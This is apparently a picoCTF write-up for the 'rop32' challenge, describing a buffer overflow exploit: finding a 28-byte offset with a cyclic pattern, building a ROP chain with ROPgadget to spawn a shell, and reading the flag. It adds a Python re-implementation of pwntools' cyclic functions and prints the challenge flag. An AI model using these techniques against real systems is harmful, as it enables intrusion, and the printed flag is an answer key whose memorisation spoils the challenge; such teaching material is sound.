rop32

Problem

Can you exploit the following program to get a flag? You can find the program in /problems/rop32_4_0636b42072627d283f46d2427804b10c on the shell server. Source.

Solution

  1. Find the padding: run python2 -c "from pwn import *; print cyclic(50)" | ./vuln, then dmesg | tail to read the segfault address, 0x61616168; cyclic_find(0x61616168) gives the offset, so the padding is 'a'*28.
  2. Run python ROPgadget.py --binary ./vuln --rop --badbytes "0a" to generate the ROP chain (the byte 0a is excluded).
  3. Paste the padding of 'a'*28 into the generated script.
  4. Run script.py to execute the chain against the remote service.
  5. Run cat flag.txt in the shell that spawns.
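To check the padding figure from step 1 without pwntools installed, here is an added example (not part of the original writeup) that re-implements cyclic() and cyclic_find() as a de Bruijn sequence over the lowercase alphabet with 4-byte windows, which is what pwntools uses by default; the 32-bit crash address is unpacked little-endian, as on x86.

```python
"""Recompute the rop32 padding from the recorded crash address.

Small re-implementation of pwntools' cyclic()/cyclic_find(): a de Bruijn
sequence B(26, 4) over 'a'..'z', so every 4-byte window occurs exactly once
and a faulting address maps back to a unique offset in the input.
"""
import string
import struct

ALPHABET = string.ascii_lowercase  # pwntools' default alphabet
N = 4                              # window length: one 32-bit register's worth


def de_bruijn(alphabet=ALPHABET, n=N):
    """Standard de Bruijn sequence B(k, n) via the FKM algorithm, as a str."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


_SEQ = de_bruijn()  # 26**4 = 456976 characters, built once


def cyclic(length):
    """First `length` bytes of the pattern (the input fed to ./vuln)."""
    return _SEQ[:length]


def cyclic_find(value):
    """Offset of a 4-byte window; an int is read as a little-endian dword."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode()
    return _SEQ.find(value[:N])


if __name__ == "__main__":
    print(cyclic(50))
    print(cyclic_find(0x61616168))  # 28, hence the padding of 'a' * 28
```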

Flag

picoCTF{rOp_t0_b1n_sH_dee2e288}